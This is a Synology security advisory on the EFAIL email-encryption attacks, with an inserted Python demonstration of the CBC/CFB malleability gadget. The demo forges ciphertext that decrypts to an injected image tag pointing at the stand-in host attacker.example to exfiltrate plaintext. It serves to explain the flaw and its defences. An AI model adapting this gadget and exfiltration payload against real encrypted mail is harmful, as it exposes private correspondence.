Synology-SA-18:22 EFAIL
Publish Time: 2018-05-15 19:16:15 UTC+8
Last Updated: 2019-12-24 14:27:10 UTC+8
- Severity: Not affected
- Status: Resolved
Abstract
The EFAIL attacks allow a remote attacker who has obtained an OpenPGP- or S/MIME-encrypted email to recover its plaintext. The attacker modifies the ciphertext so that, after the recipient's client decrypts it, the message contains attacker-chosen HTML (for example an image tag whose URL wraps the decrypted text); when the client renders that HTML, the plaintext is sent to an attacker-controlled server. The attack therefore depends on the mail client rendering HTML in decrypted content.
Synology products are not affected because MailPlus, Android MailPlus, and iOS MailPlus do not render HTML in OpenPGP or S/MIME messages.
Affected Products
Product | Severity | Fixed Release Availability |
---|---|---|
MailPlus | Not affected | N/A |
Android MailPlus | Not affected | N/A |
iOS MailPlus | Not affected | N/A |
Mitigation
None
Detail
CVE-2017-17688
- Severity: Moderate
- CVSS3 Base Score: 5.3
- CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
- ** DISPUTED ** The OpenPGP specification allows a Cipher Feedback Mode (CFB) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL. NOTE: third parties report that this is a problem in applications that mishandle the Modification Detection Code (MDC) feature or accept an obsolete packet type, not a problem in the OpenPGP specification.
CVE-2017-17689
- Severity: Moderate
- CVSS3 Base Score: 5.3
- CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
- The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
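The two CVE descriptions above refer to the same underlying trick in two cipher modes. The following is an added, self-contained Python illustration of that CBC and CFB "malleability gadget"; it is not Synology's code and not the efail.de researchers' code. The block cipher is a stand-in (a 4-round Feistel network with a SHA-256 round function, a genuine invertible 16-byte permutation but not AES), the OpenPGP MDC is simplified to a SHA-256 tag appended to the plaintext, and the key, IV, message and injected payload are constructed sample values. What the code shows is that an attacker who knows only the IV, the first ciphertext block and the plaintext of that block (for S/MIME the leading `Content-Type:` header is usually guessable) can, without the key, build ciphertext that decrypts to chosen blocks interleaved with junk blocks, and that an integrity check over the plaintext catches the forgery.

```python
"""Added illustration of the EFAIL CBC/CFB malleability gadget (not Synology code).

The block cipher below is a stand-in: a 4-round Feistel network whose round
function is SHA-256. It is a real invertible 16-byte permutation, which is all
that CBC/CFB malleability depends on, but it is NOT AES and exists only to keep
the demo dependency-free. The "MDC" is likewise simplified to SHA-256 over the
plaintext. Key, IV, message and payload are constructed sample values.
"""
import hashlib

BLOCK = 16
HALF = BLOCK // 2
ROUNDS = 4


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def pad(data: bytes) -> bytes:
    """Space-pad to a block multiple (real S/MIME uses PKCS#7; irrelevant here)."""
    return data + b" " * (-len(data) % BLOCK)


def _f(key: bytes, r: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:HALF]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for r in range(ROUNDS):
        left, right = right, xor(left, _f(key, r, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for r in reversed(range(ROUNDS)):
        left, right = xor(right, _f(key, r, left)), left
    return left + right


def cbc_encrypt(key, iv, pt):  # C_i = E(P_i XOR C_{i-1})
    out, prev = [], iv
    for p in blocks(pt):
        prev = block_encrypt(key, xor(p, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):  # P_i = D(C_i) XOR C_{i-1}
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def cfb_encrypt(key, iv, pt):  # C_i = E(C_{i-1}) XOR P_i
    out, prev = [], iv
    for p in blocks(pt):
        prev = xor(block_encrypt(key, prev), p)
        out.append(prev)
    return b"".join(out)


def cfb_decrypt(key, iv, ct):  # P_i = E(C_{i-1}) XOR C_i (forward cipher only)
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(block_encrypt(key, prev), c))
        prev = c
    return b"".join(out)


MODES = {"cbc": (cbc_encrypt, cbc_decrypt), "cfb": (cfb_encrypt, cfb_decrypt)}


def seal(mode, key, iv, plaintext):
    """Sender: encrypt the padded body followed by a simplified MDC (SHA-256 of body)."""
    body = pad(plaintext)
    return MODES[mode][0](key, iv, body + hashlib.sha256(body).digest())


def open_message(mode, key, iv, ct):
    """Recipient: returns (decrypted stream, mdc_ok). A client that goes on to
    render the stream when mdc_ok is False is what the OpenPGP CVE note describes."""
    pt = MODES[mode][1](key, iv, ct)
    body, tag = pt[:-32], pt[-32:]
    return pt, hashlib.sha256(body).digest() == tag


def gadget(mode, iv, c1, p1, chosen):
    """Two ciphertext blocks that decrypt, under the victim's unknown key, to
    (junk, chosen). Needs only the IV, the first ciphertext block C1 and its
    known plaintext P1.
    CBC: D(C1) XOR X = P1 XOR IV XOR X, so choose X = IV XOR P1 XOR chosen.
    CFB: E(IV) XOR Y = P1 XOR C1 XOR Y, so choose Y = C1 XOR P1 XOR chosen."""
    if mode == "cbc":
        return xor(xor(iv, p1), chosen) + c1
    return iv + xor(xor(c1, p1), chosen)


def build_forgery(mode, iv, ct, known_p1, payload):
    """Attacker: a chain of gadgets spelling `payload`, one chosen block per
    gadget, each preceded by one junk block. No key material is used."""
    c1 = ct[:BLOCK]
    return b"".join(gadget(mode, iv, c1, known_p1, chunk) for chunk in blocks(pad(payload)))


def chosen_blocks(pt):
    """What the attacker controls: every odd-indexed block of the decrypted forgery."""
    return b"".join(b for i, b in enumerate(blocks(pt)) if i % 2 == 1)


if __name__ == "__main__":
    key, iv = b"0123456789abcdef", b"fedcba9876543210"   # constructed sample values
    msg = b"Content-Type: multipart/signed; boundary=x\r\n\r\nSecret body"
    payload = b'<img src="http://attacker.example/?x">'   # hypothetical attacker host
    for mode in MODES:
        ct = seal(mode, key, iv, msg)
        forged = build_forgery(mode, iv, ct, msg[:BLOCK], payload)
        pt, ok = open_message(mode, key, iv, forged)
        print(mode, "mdc_ok:", ok, "chosen:", chosen_blocks(pt))
```

In a real attack the junk blocks are placed where HTML ignores them (inside a quoted attribute, for instance), and the exfiltrated secret is the original ciphertext spliced in between gadgets so that it decrypts inside the image URL; the stand-in cipher here is only a placeholder for AES, and the gadget math is identical. The two defences visible in the code are the ones the advisory and the CVE note rely on: a client that never renders HTML from decrypted content has no exfiltration channel, and a client that refuses to show plaintext whose MDC fails never reaches the rendering step.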
Reference
- https://efail.de
- OpenPGP and S/MIME mail client vulnerabilities
- OpenPGP, S/MIME Mail Client Vulnerabilities
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689
Revision
Revision | Date | Description |
---|---|---|
1 | 2018-05-15 | Initial public release. |
2 | 2019-12-24 | Disclosed vulnerability details. |